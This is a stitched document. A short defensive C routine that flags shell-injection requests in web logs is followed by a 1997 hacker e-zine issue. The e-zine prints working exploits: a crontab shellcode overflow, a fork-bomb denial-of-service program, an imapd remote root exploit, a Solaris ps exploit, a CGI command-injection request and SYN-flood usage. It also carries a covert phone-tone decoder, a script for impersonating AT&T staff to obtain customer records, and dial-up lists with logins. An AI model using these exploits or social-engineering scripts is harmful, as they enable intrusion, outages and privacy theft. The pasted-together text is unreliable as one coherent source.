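/* The vulnerable pattern, as a comment only: building a command line from
 * the raw parameter and handing it to system(), e.g.
 *     sprintf(cmd, "ls -l %s", distloc); system(cmd);
 * lets "distloc=;cat /etc/passwd" append a second command. */

/* Allowlist for a path-like parameter: letters, digits, '.', '_', '-', '/',
 * no ".." component and no leading '/'. Returns 1 if acceptable. Rejecting,
 * rather than stripping characters, keeps the check easy to reason about. */
int cgi_param_is_safe(const char *p)
{
    if (*p == '\0' || *p == '/')
        return 0;
    for (const char *c = p; *c != '\0'; c++) {
        unsigned char ch = (unsigned char)*c;
        if (!(isalnum(ch) || ch == '.' || ch == '_' || ch == '-' || ch == '/'))
            return 0;
        if (c[0] == '.' && c[1] == '.')      /* blocks directory traversal */
            return 0;
    }
    return 1;
}

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode %XX escapes in place so %20 (space) and %0a (newline) are inspected
 * as the characters the server would actually hand to a shell. */
void url_decode(char *s)
{
    char *out = s;
    for (; *s != '\0'; s++) {
        int hi = hexval((unsigned char)s[1]), lo = -1;
        if (*s == '%' && hi >= 0 && (lo = hexval((unsigned char)s[2])) >= 0) {
            *out++ = (char)(hi * 16 + lo);
            s += 2;
        } else {
            *out++ = *s;
        }
    }
    *out = '\0';
}

/* Return 1 if the request target of a common-log-format line contains a
 * shell metacharacter once decoded. The target is everything between the
 * method and " HTTP/", so metacharacters in the path (handler) count as
 * well as those in the query string (webdist.cgi). */
int request_looks_injected(const char *logline)
{
    char target[1024];
    const char *start = strchr(logline, '"');
    if (start == NULL)
        return 0;
    start = strchr(start + 1, ' ');           /* skip the method token */
    if (start == NULL)
        return 0;
    start++;
    const char *end = strstr(start, " HTTP/");
    size_t len = end ? (size_t)(end - start) : strlen(start);
    if (len >= sizeof target)
        len = sizeof target - 1;
    memcpy(target, start, len);
    target[len] = '\0';
    url_decode(target);
    return strpbrk(target, ";|&`$\n<>") != NULL;
}

/* Constructed access-log sample: requests quoted in this file, made-up hosts. */
static const char *const sample_log[] = {
    "10.0.0.5 - - [15/Jul/1997:10:01:12 +0000] \"GET /index.html HTTP/1.0\" 200 2048",
    "10.0.0.9 - - [15/Jul/1997:10:02:40 +0000] \"GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0\" 200 1290",
    "10.0.0.9 - - [15/Jul/1997:10:03:01 +0000] \"GET /cgi-bin/wrap?/etc HTTP/1.0\" 200 880",
    "10.0.0.3 - - [15/Jul/1997:10:04:15 +0000] \"GET /cgi-bin/handler/x;cat /etc/passwd|?data=Download HTTP/1.0\" 200 1290",
    NULL
};

/* Count flagged lines in a NULL-terminated array of log lines. */
int count_injected(const char *const *lines)
{
    int n = 0;
    for (; *lines != NULL; lines++)
        n += request_looks_injected(*lines);
    return n;
}

int main(void)
{
    for (const char *const *l = sample_log; *l != NULL; l++)
        printf("%s  %s\n", request_looks_injected(*l) ? "SUSPECT" : "ok     ", *l);
    printf("%d requests flagged\n", count_injected(sample_log));
    printf("';cat /etc/passwd' passes allowlist: %d\n", cgi_param_is_safe(";cat /etc/passwd"));
    return 0;
}
```

Note that wrap?/etc is not flagged: it carries no metacharacter, because it is a disclosure bug rather than an injection, and the remedy there is removing or replacing the script, not filtering its input. The allowlist is deliberately narrow; a script that needs a richer parameter should still avoid the shell entirely and pass the value as a single argv element to execve.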
=============================================================================== Usages : =============================================================================== Use this command to unzip the crak.tar... % tar -xvf crak.tar then it will be copied into /crak, depending on the working directory.. DNSscan : --------- Usage: dnscan [-file ] [-domain ] [-sub ] -file Usages as a list of subdomains and servers to scan. -domain Lists all servers in a first level domain like com or net. -subdomain Lists all servers in a domain. The -domain mode will first create a file called 'domain.' with a list of all subdomains and their name servers, and then use that file in the -file mode. The input file needs to have the following format: [] To list all servers in Japan, do "dnscan -domain jp" To list all servers in the netcom domain, do "dnscan -sub netcom.com" PHPscan : --------- phpscan eg. phpscan domains.txt phpvunerable.txt PHPget : -------- phpget eg. phpget www.p1.com /etc/passwd PHFscan : --------- phfscan eg. phfscan domains.txt phfvunerable.txt Ident-Scan : ------------ ident-scan [low port] [high port] eg. ident-scan warped.arc.nasa.gov 1 9999 TCPprobe : ---------- tcpprobe eg. tcpprobe microsoft.com Fingah : -------- fingah eg. fingah www.p1.com root Synk4 : ------- synk4 if you use 0 as the source address, its puts the syn flooder into random ip mode, where the packets are sent from many different random sites. eg. synk4 0 fucked.com 1 23 Have Phun!@# =============================================================================== Where To Get CRAK.tar : Under CodeZero Linux Tools Section on www.codez.com =============================================================================== It can be unzipped with WinZip if you are in W1nd0ze too.. :) =============================================================================== ==[ FIN ]======================[ .SECTION G. 
]========================[ FIN ]==
===============================================================================

Well, that was issue 2, hope ya'll liked it, don't forget to visit...

AnD ReMeMBer To LiNk To iT FrOm YouR SiTeZ!!

=====================> http://www.codez.com NOW UP!@#* <=====================
=====================> http://www.codez.com NOW UP!@#* <=====================
=====================> http://www.codez.com NOW UP!@#* <=====================

Until next time, when there will be 900 days until the year 2000...

The CodeZero.

===============================================================================
=====================> http://www.codez.com NOW UP!@#* <=====================
===============================================================================

Remember, McDonalds Owns You, And Ronald Is The KinG!!!
Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*


                           .oO The CodeZero Oo.
                             .oO Presents Oo.

      ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
      ▓   -C-O-N-F-i-D-E-N-C-E-    -R-E-M-A-i-N-S-    -H-i-G-H-           ▓
      ▓                                                                   ▓
      ▓                   Issue 003, July 15th 1997.                      ▓
      ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓

Are you on a w1nd0ze / D0s system? We suggest you view this in EDIT.COM
For added AsKii effects!@#

      _ /|      k0dek4t sez...
      \'o O'
      =(_o_)=   "EyEm HuNGaRy FoR CoDeZ, U nOt CaTf00d!!#@"

                     ----------------------------------
                     --     HTTP://WWW.CODEZ.COM     --
                     ----------------------------------

In This "Added Vitamins And Minerals" Issue :

-----=> Section A : Introduction And Cover Story.

1. Confidence Remains High Issue 3....................: Tetsu Khan
2. The Future.........................................: so1o

-----=> Section B : Exploits And Code.

1. crontab b00gz......................................: unknown
2. DoS : superforker.c................................: Vio
3. Cool Bot Juarez : personal.tcl.....................: Scorn
4. imapd Remote Exploit...............................: aky / p1
5. Solaris 2.5.1 ps Exploit...........................: J. Zbiciak
6. handler CGI Hole...................................: so1o

-----=> Section C : Phones / Scanning / Radio.

1. DTMF Decoder.......................................: xFli
2. Dealing With Directory Assistance Operators........: Qytpo
3. Russian fone #'s (+7 095 XXXxxxx)..................: CyberLirik

-----=> Section D : Miscellaneous.

1. More sIn inf0z.....................................: The CodeZero + Friends
2. The Codez That NASA Use............................: so1o
3. Rooting From Bin...................................: so1o
4. DNS Spoofing.......................................: so1o
5. FreeNet............................................: TrN
6. Backdoors Revised..................................: Blk-Majik
7. One Last Thing About The Infamous pHf Technique....: so1o

-----=> Section E : World News.

1. Some History.......................................: nobody
2. [GUNNAR] and MadSeason and sIn.....................: so1o
3. "Welcome to the [D]epartment of [O]wned [E]nergy"..: so1o

------=> Section F : Projects.

1. The CodeZero Remote Attack Kit Version 1.00 *FiNAL*: so1o

-----=> Section G : The End. (+ Personal Column)

===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================

1. Confidence Remains High Issue 3 : Tetsu Khan

Because we just cannot keep the payments for www.codez.com up, and the server
keeps going up and down and up and down, Confidence Remains High and CodeZero
tools will soon be available at the following sites :

http://insecurity.insecurity.org/codez/      [ main site, write it down :) ]
http://www.7thsphere.com/hpvac/hacking.html  [ CRH distro site ]
http://www.r0ot.org                          [ CRH distro site ]

Also available thru FTP...

ftp.sekurity.org /users/so1o/                [ Codez distro site ]

But we are hoping to set up a new SUPER DOMAIN!@# Expect that within the next
issue or two, it will have...
CooL o-DaY WaReZ eLeeT VMS hAx0RiN TeXt FiLeZ K-r4d ANSi!@# 2. The Future : so1o The Squirel is your friend, love the Squirel, trust the Squirel... so1o =============================================================================== ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]== =============================================================================== 1. crontab b00gz : unknown /* crontab bug */ #include #include long get_esp(void) { __asm__("movl %esp, %eax\n"); } main(int argc, char **argv) { int i, j, offset; char *bar, *foo; unsigned long *esp_plus = NULL; char mach_codes[] = "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; if (argc == 2) offset = atoi(argv[1]); bar = malloc(4096); if (!bar){ fprintf(stderr, "failed to malloc memory\n"); exit(1); } foo = bar; /* copy of original ptr */ esp_plus = (long *)bar; for(i=0; i < 1024 ; i++) *(esp_plus++) = (get_esp() + offset); printf("Using offset (0x%x)\n", (get_esp() + offset)); bar = (char *)esp_plus; for(j=0; j< strlen(mach_codes); j++) *(bar++) = mach_codes[j]; *bar = 0; execl("/usr/bin/crontab", "crontab", foo, NULL); } 2. DoS : superforker.c : Vio This program is fucking evil, I have tested it on a few systems and it just screws them over and sloooOOooows them right down, you cant throw anything at the shell, its pretty sadistic... /* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the bugtraq This program is a beefed up classic denial of service fork()'er :) Compilation: on BSD type of systems do: gcc -DBSD_C -o cvn cvn.c on SysV type of systems do: gcc -DSYSV_C -o cvn cvn.c on my linux, I can compile it with both -DBSD_C and -DSYSV_C if your not sure, you can experiment, or compile it without any -D'efines In the future: SunOS signals ignored. 
Creation of random symlinks for more gory destruction. Using advanced technology coding to make the hard drive blow up with a loud boom and the console explode causing a nuclear meltdown. Direct All Suggestions And Flames to: Vio NOTE: this program is provided for educational purposes only, its author will not take any responsibility for any stupid things you will decide to do. this has been tested, but not the latest version of it. */ #include #include #include #include #include #include #include #define MAX_FILELEN 100 /* The _actual_ max length */ #define MAX_DIRLEN 10 #define START_DIR "/tmp" /* This can be substituted for any directory */ /* that you have write access to */ void dirs_generator(void); main(int argc, char *argv[]) { int fp; char *buff; char chr; unlink(argv[0]); /* You might wanna ignore all the signals you can ignore.. */ signal(SIGINT, SIG_IGN); /* If any of the signals don't work */ signal(SIGHUP, SIG_IGN); /* on the system you are compiling */ signal(SIGTERM, SIG_IGN); /* them on, just erase that line */ signal(SIGALRM, SIG_IGN); signal(SIGBUS, SIG_IGN); signal(SIGFPE, SIG_IGN); signal(SIGILL, SIG_IGN); signal(SIGIOT, SIG_IGN); signal(SIGPIPE, SIG_IGN); signal(SIGQUIT, SIG_IGN); signal(SIGSEGV, SIG_IGN); signal(SIGTRAP, SIG_IGN); signal(SIGUSR1, SIG_IGN); signal(SIGUSR2, SIG_IGN); #ifdef BSD_C signal(SIGPROF, SIG_IGN); signal(SIGSTOP, SIG_IGN); signal(SIGTSTP, SIG_IGN); signal(SIGTTIN, SIG_IGN); signal(SIGTTOU, SIG_IGN); signal(SIGVTALRM, SIG_IGN); signal(SIGXCPU, SIG_IGN); signal(SIGXFSZ, SIG_IGN); #endif #ifdef SYSV_C signal(SIGPOLL, SIG_IGN); signal(SIGPWR, SIG_IGN); #endif if(fork()) { printf("Now crashing and blowing up this system.. 
have a nice day\n"); printf("You can safely logout, and let the proggie do its work\n"); printf("or you can stick around and watch lag go from 0 to bitch\n"); printf("in a matter of seconds\n"); printf(" --CoViN \n"); exit(0); } fp=open("/tmp/.foo",O_WRONLY|O_CREAT); if(fork()) { while(1) { fork(); buff = malloc(64000); write(fp, buff, 64000); system("uptime"); } } dirs_generator(); } void dirs_generator(void) { char alph[] = " abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. "; char fl[MAX_FILELEN]; char dir[MAX_DIRLEN]; int i; int flen; printf("Making dirs..\n"); chdir(START_DIR); fork(); /* For the simplicity of the code.. we also want more dir's from */ fork(); /* the START_DIR */ fork(); while(1) { fork(); flen= (rand() % MAX_FILELEN) - 1; for(i=0; i> Persona-Answer" return 1 } return 0 } # function to answer greetings proc pub_greet {nick uhost hand channel args} { global greets greet_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$greets([rand $greet_size]) $nick" putlog "<<$nick>> Persona-Greet" return 1 } return 0 } # function to answer stupid stuff proc pub_stupid {nick uhost hand channel args} { global stupid stupid_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$nick , $stupid([rand $stupid_size])" putlog "<<$nick>> Persona-Stupid" return 1 } return 0 } # function to answer goodbyes proc pub_bye {nick uhost hand channel args} { global bye bye_size persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$bye([rand $bye_size]) $nick" putlog "<<$nick>> Persona-Bye" return 1 } return 0 } # misc. 
functions proc pub_tk3 {nick uhost hand channel args} { global persona_flag if {$persona_flag} { persona_pause putserv "PRIVMSG $channel :$nick, check out tk3play at bleh" putlog "<<$nick>> Persona-tk3play" return 1 } return 0 } # function to enforce minimum pause between responses proc persona_pause {} { global persona_flag persona_wait if {$persona_flag} { persona_off utimer $persona_wait persona_on } return 1 } # functions to turn the personality on and off proc persona_on {} { global persona_flag set persona_flag 1 return 1 } proc persona_off {} { global persona_flag set persona_flag 0 return 1 } putlog "Scorn's persona.tcl is loaded" 4. imapd Remote Exploit : aky / p1 This is the slightly upgraded version of this exploit floating around, there is also another, which is very hard to get, which spawns a shell with root access, I have also heard of European hacker groups coding homemade versions and variants which will this, so for the moment, heres this exploit, imapd usually runs on port 143. This version changes the root passwd field to being blank, so you can su to root without a password. I have heard there are problems and limitations with this, but that ain't my problem.. /* This is the remote exploit of the hole in the imap daemon, for Linux. The instruction code is doing open(), write(), and close() system calls, and it adds a line root::0:0.. at the beggining of /etc/passwd (change to /etc/shadow if needed). The code needs to be self modifying since imapd turns everything to lowercase before it pushes it on the stack. The problem is that it rewrites the first line of passwd/shadow, therefore loosing the root password. I'm sorry, but I don't have time to add in the seek syscall. - Akylonius (aky@galeb.etf.bg.ac.yu) [1997] Modifications made on 5.1.97 to accept command line hostname, with 'h_to_ip' function that resolves it to an ip. 
- p1 (p1@el8.org) */ #include #include #include #include #include #include #include char *h_to_ip(char *hostname); char *h_to_ip(char *hostname) { struct hostent *h; struct sockaddr_in tmp; struct in_addr in; h = gethostbyname(hostname); if (h==NULL) { perror("Resolving the host. \n"); exit(-1); } memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length); memcpy(&in,&tmp.sin_addr.s_addr,4); return(inet_ntoa(in)); } void banner(void) { system("clear"); printf("\nIMAP Exploit for Linux.\n"); printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n"); printf(" Modifications: p1 (p1@el8.org)\n"); } main(int argc, char **argv) { int fd; struct sockaddr_in sckdaddr; char *hostname; char buf[4092]; int i=8; char realegg[] = "\xeb\x58\x5e" "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26" "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8" "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2" "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31" "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31" "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1" "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83" "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80" "\xe8\x83\xff\xff\xff" "/etc/passwdxroot::0:0:r00t:/:/bin/bashx"; char *point = realegg; buf[0]='*'; buf[1]=' '; buf[2]='l'; buf[3]='o'; buf[4]='g'; buf[5]='i'; buf[6]='n'; buf[7]=' '; banner(); if (argc<2) { printf("\nUsage: %s \n\n", argv[0]); exit(-1); } hostname=argv[1]; while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */ buf[i++]=0x90; while(*point) buf[i++]=*(point++); buf[i++]=0x83; /* ebp */ buf[i++]=0xf3; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=0x88; /* ret adr */ buf[i++]=0xf8; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=' '; buf[i++]='b'; buf[i++]='a'; buf[i++]='h'; buf[i++]='\n'; buf[i++]=0x0; if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the socket. 
\n"); sckdaddr.sin_port=htons(143); sckdaddr.sin_family=AF_INET; sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname)); if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0) perror("Error with connecting. \n"); printf("hmm: \n"); getchar(); write(fd,buf,strlen(buf)+1); printf("hmm: \n"); close(fd); } 5. Solaris 2.5.1 ps Exploit : J. Zbiciak #!/bin/sh # # Exploit for Solaris 2.5.1 /usr/bin/ps # J. Zbiciak, 5/18/97 # # Just copy this into one file, upload it to a system, chmod 755 and # then run it using # change as appropriate CC=gcc # Build the "replacement message" :-) cat > ps_expl.po << E_O_F domain "SUNW_OST_OSCMD" msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n" msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025\343\150\220\013\200\016\222\003\240\014\224\032\200\012\234\003\240\024\354\073\277\354\300\043\277\364\334\043\277\370\300\043\277\374\202\020\040\073\221\320\040\010\220\033\300\017\202\02 0\040\001\221\320\040\010" E_O_F msgfmt -o /tmp/foo ps_expl.po # Build the C portion of the exploit cat > ps_expl.c << E_O_F /*****************************************/ /* Exploit for Solaris 2.5.1 /usr/bin/ps */ /* J. Zbiciak, 5/18/97 */ /*****************************************/ #include #include #include #include #define BUF_LENGTH (632) #define EXTRA (256) int main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA]; /* ps will grok this file for the exploit code */ char *envp[]={"NLSPATH=/tmp/foo",0}; u_long *long_p; u_char *char_p; /* This will vary depending on your libc */ u_long proc_link=0xef70ef70; int i; long_p = (u_long *) buf; /* This first loop smashes the target buffer for optargs */ for (i = 0; i < (96) / sizeof(u_long); i++) *long_p++ = 0x10101010; /* At offset 96 is the environ ptr -- be careful not to mess it up */ *long_p++=0xeffffcb0; *long_p++=0xffffffff; /* After that is the _ctype table. Filling with 0x10101010 marks the entire character set as being "uppercase printable". 
*/ for (i = 0; i < (BUF_LENGTH-104) / sizeof(u_long); i++) *long_p++ = 0x10101010; /* build up _iob[0] (Ref: /usr/include/stdio.h, struct FILE) */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x0501FFFF; /* unbuffered output on stream 1 */ /* Note: "stdin" is marked as an output stream. Don't sweat it. :-) */ /* build up _iob[1] */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x4201FFFF; /* line-buffered output on stream 1 */ /* build up _iob[2] */ *long_p++ = 0xFFFFFFFF; /* num chars in buffer */ *long_p++ = proc_link; /* pointer to chars in buffer */ *long_p++ = proc_link; /* pointer to buffer */ *long_p++ = 0x4202FFFF; /* line-buffered output on stream 2 */ *long_p =0; /* The following includes the invalid argument '-z' to force the usage msg to appear after the arguments have been parsed. */ execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp); perror("execle failed"); return 0; } E_O_F # Compile it $CC -o ps_expl ps_expl.c # And off we go! exec ./ps_expl 6. handler CGI Hole : so1o New bug that affects most IRIX systems, heres how you use it... telnet target.machine.com 80 GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0 =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== 1. DTMF Decoder : xFli DTMF Decoder plans. ------------------- If you are into bigtime surveillance, or you just have some burning desire to get the phone number of your sisters sexy friend, then you will be interested in this little circuit. 
Basically, using this, you can use a tape recorder and a pickup coil to record
the DTMF tones sent when someone dials a number, or if it is easier you can
wire it up to a phone jack and decode in realtime, and then decode them to get
the number dialled. This can cope with speed dialling, but you will need a
reasonably good recording to decode successfully.

The circuit is simplicity itself, literally only 5 components. I could have
included an unreadable ascii circuit diag / pcb layout, but it would have been
a waste of time, so the diags are available from http://www.codez.com and other
CodeZero sites.

The hardware takes the DTMF signal, decodes it and sends it to lpt1, where the
binary output of the ic is converted into standard numbers. The simple BASIC
program is included, which is precompiled on http://www.codez.com

Component list:
----------------

1 x SSI202 18 pin Chip
1 x 3.579 MHz quartz crystal
2 x 27n Capacitors
1 x 1M resistor

Source:
--------

DTMF DECODER SOFTWARE
------------------------------------------
' Use this to decode the output from the decoder hardware
' Not written by xFli, suggested in an electronics mag.
' The wait loops jump back to the INP line so the port is re-read
' on every pass (lines 30, 180 and 220); otherwise they never end.

10 CLS:KEY OFF
20 I=INP(&H279)
30 IF (I AND 128)=128 THEN 20
40 C=0
50 IF (I AND 8)=8 THEN C=C+1
60 IF (I AND 16)=16 THEN C=C+2
70 IF (I AND 32)=32 THEN C=C+4
80 IF (I AND 64)=64 THEN C=C+8
90 IF C=11 THEN PRINT" * ";:GOTO 180
100 IF C=12 THEN PRINT" # ";:GOTO 180
110 IF C=13 THEN PRINT" A ";:GOTO 180
120 IF C=14 THEN PRINT" B ";:GOTO 180
130 IF C=15 THEN PRINT" C ";:GOTO 180
140 IF C=0 THEN PRINT" D ";:GOTO 180
150 IF C=10 THEN PRINT" 0 ";:GOTO 180
160 PRINT C;
170 I=INP(&H279)
180 IF (I AND 128)=0 THEN 170
190 T=TIMER
200 I=INP(&H279)
210 IF (TIMER-T)>5 THEN PRINT:PRINT:GOTO 20
220 IF (I AND 128)=128 THEN 200
230 GOTO 50

In the magazine, it is advised you use gw-basic, which is included with very
very early DOS versions. It may or may not work with qbasic etc. I don't know.
DTMF is an international standard, so the tones are the same in the UK and the US; the decoder works on either.

2. Dealing with directory assistance operators : Qytpo

Alright, this information should be made available to everyone who cares to read it. Any information used from this article is to be used at a person's own risk. I will not be held responsible if any of this is used for wrongful purposes (it can, you just have to get really creative).

Well, to start off, the job of the directory assistance operator is to give out addresses, phone numbers, and area codes for the information given to them. The operators can search from names, business names, and government names. Despite what anyone tells you, an AT&T DIRECTORY ASSISTANCE OPERATOR CAN DO A CNA SEARCH (Customer Name and Address). If the particular operator says they can't, then bug them. Yell at them. If they don't do it themselves, they will get their supervisor, and if you make it sound really important they can do it. If all that doesn't work, try to find a naive operator, tell them you are an AT&T administrator, and say to press Control+C to bring up a CNA search on their switch.

A CNA search is a very valuable asset. If you cannot find a CNA operator, give a directory assistance operator a whirl; chances are, if you have a brain and are a decent actor, you can get the listing for the number you give them.

Routing.

The calls are routed through a large mainframe in each state department.

How it works: say you dial 602-555-1212. That would put you through to an operator ANYWHERE in the United States where Phoenix calls are routed to. It will not just appear in 602, although that is where it is supposed to. If the switches in 602 are full, the call could end up anywhere in the US. When the operator picks up the receiver (it is actually a headset that beeps), the call is automatically traced to whatever area code they dialed. So if you dialed (602 555 1212),
an operator anywhere in the US would get a listing on their screen, and a default city in the upper left hand corner: [PHOE] (Phoenix, Arizona).

[*note*: depending on the area code, 602 for example, the operator can search the area codes permitted for that area code. For example, if you dialed 602-555-1212, the operator would be allowed to search in 520 (the other area code in AZ).]

However, in some area codes they will make you redial, like LA, or Texas, or New York; they have so many area codes. For example 310 and 213 in Los Angeles: if you dialed 213-555-1212 and wanted a listing for a city in Los Angeles which was in 310, they would make you hang up and dial 310-555-1212. (The operator should be saying to himself/herself, "no, this kiddie needs to call 310 instead, or I get fired for giving out bad information"... if they have a clue.)

Sample call to a DAO for a CNA search (the best way to get info):

(caller dials 555-1212 in area code)

City please?

Yes, this is James Thornton at AT&T, the AT&T administrative assistance office. I need you to do a CNA search for me.

I'm sorry sir, we're not permitted to do CNA searches.

Yes, I know. May I speak to a supervisor?

This is So-and-so, supervisor, how can I help you sir?

Yes, this is James Thornton down at the AT&T (also called Excel) office in Florida, we need a CNA search done for XXX-XXX-XXXX.

One moment please. Ok. Ok, I am (or am not) showing a listing for XXX-XXX-XXXX, would you like that listing sir?

Yes please, and I would like that verbally.

(If you time it just right, you can get the info for free. If you're beige boxing, it doesn't really make a difference though.) Hang up, say "what" a few times to make it sound like you didn't get the listing, and hang up before she finishes the second time. She can only bill you while you are on the line, and if she fucks up, you can get away with no bill while they read you the number. This method only works for a verbal listing,
if you're quick enough. ;)

- - - The NPA RULES. - - -

NPA dialed : NPAs permitted to search in from the NPA dialled

-----California----

213 : 213
209 : 408 510 707 916
408 : 209 415 510 707
510 : 209 408 415 707 916
707 : 209 415 510 916
714 : 714
916 : 209 510 707

-------Texas-------

210 : 512 915
214 : 817 903 972
281 : 409 713
409 : 281 512 713 817 903
512 : 210 409 817 915
713 : 281 409 806 817 915
817 : 214 409 512 806 903
903 : 214 409 817
915 : 210 512 806 817
972 : 214 817 903

-----New York------

212 : 718 914 917
315 : 518 607 716
516 : 718
518 : 315 607 914
607 : 315 518 716 914
716 : 315 607
718 : 212 518 914
914 : 212 518 607 718
917 (cell) : 212 718 914

*note*: all other states can search all NPAs listed in that state.

- Qytpo (@#hackers on EFnet)

3. Russian fone #'s (+7 095 XXXxxxx) : CyberLirik

Some interesting ph0ne #'s [07.06.97]

Have some real phun with these, they are up-to-date!@#

[RUSSiA] +7 095 XXXxxxx

-----------------------------------------------------------------------
AT&T Calling Cards Service
-----------------------------------------------------------------------
9740074   Tone system - AT&T Moscow HQ. Switch to tone mode and press 0 to
          page the operator; pressing "1" lets you record a voice message,
          pressing "2" & "3" plays your recording back :)
7555042   English-speaking AT&T operator
1555042   The automated AT&T calling system is also here (tone mode)
7555555   Russian-speaking AT&T operator
1555555   No AT&T tone machine!
-----------------------------------------------------------------------
Sprintnet Local Dial-Ups, 02501 & 03110 DNICs (GlobalOne = Sprintnet = Telenet)
-----------------------------------------------------------------------
9286344   9600
9280985   9600
9137166   9600  < only for mail
5789119   2400
3428376   9600, real connect 2400
9167373   SprintNet V34-19200
9167272   ???
9167171   ?
00wait8   RoSprint PPP dialup.
-----------------------------------------------------------------------
ROSPAC Local Dial-Ups, 02500 DNIC
-----------------------------------------------------------------------
9270003   9600
9563692   9600
9563690
-----------------------------------------------------------------------
Rosnet Dialups, 02506 DNIC
-----------------------------------------------------------------------
975-8403  913-3571  921-2103  201-2030
Voice: (095) 206-8570, 206-8458, 206-7238
442-6422  442-8277  442-7022  442-8388
442-7088  442-8577  442-8077  442-6477
Iskra-2: 20-906, 33-571
-----------------------------------------------------------------------
IBM net Dial-Up
-----------------------------------------------------------------------
2586420
-----------------------------------------------------------------------
Russia@Online Dial-Ups 28.8Kbps
-----------------------------------------------------------------------
9132376   30 lines
2584120   60 lines
3619999
2584161   Voice phone!
-----------------------------------------------------------------------
InfoNet Euro
-----------------------------------------------------------------------
9150001   28.8
9150005   28.8
[unpublished]   2400 temp
[unpublished]   2400 temp
[unpublished]   2400 temp
[unpublished]   2400 temp
2927056   Infonet Euro voice!
-----------------------------------------------------------------------
Sita Network (AOLGLOBALnet & SCITOR {aka EQUANT})
-----------------------------------------------------------------------
9563589   14400 [unpublished]
9676767   24400
9676730  9676731  9676732  9676733  9676734  9676735
9676755  9676759  9676763  9676766  9676784
9562455   SITA voice phones
9564736
00wait5   STB Card
00wait9   Free information service
974 5122  Elvis+, Co. proxy 194.190.195.71
961 5122  DNS 195.190.195.66
SLIP login: iptest   temp 192.168.12.1
PPP login: pptest    Password: guest
-----------------------------------------------------------------------
CentroNet DialUp, www.astro.ru
-----------------------------------------------------------------------
7511704   14400
-----------------------------------------------------------------------
Infotel dialUps [02504]
-----------------------------------------------------------------------
9585475  9580226  9580825  9580575
-----------------------------------------------------------------------
MMTEL DialUPs [02503]
-----------------------------------------------------------------------
3371001   5 lines
2419860   .db
2418340
2461661
-----------------------------------------------------------------------
PTT-Teleport, www.ptt.ru
-----------------------------------------------------------------------
946-9383  voice, about X.25, 28, etc.
946-9393  modem, PPP
-----------------------------------------------------------------------
www.dataforce.net
-----------------------------------------------------------------------
9566749   voice
2889340
-----------------------------------------------------------------------
FaxInfo Demo Tone Voice Line
-----------------------------------------------------------------------
9629424   demo user code: 12345
9759220   Telephone voice bulletin board
-----------------------------------------------------------------------
Voice Mail boxes
-----------------------------------------------------------------------
7059285   leave me mail in box 80718
9253503   Online registration for email
9253507
-----------------------------------------------------------------------
Strange #s:
-----------------------------------------------------------------------
2587474   Logon:
2586435
2586411
2586414   30 32
9269199
9500885
9563686
-----------------------------------------------------------------------
Demos 33.8 V34 HST
-----------------------------------------------------------------------
958-19-75  958-19-81  956-62-85  956-62-86  241-05-05
961-32-00
-----------------------------------------------------------------------
www.Cityline.ru V34
-----------------------------------------------------------------------
2587884   40 lines
9567759   20
2341901   10
2450070   10
2454414   10
9564787   Interport mailbox (t0ne)
9560050   Unknown system (t0ne)
9585474   PassWord:

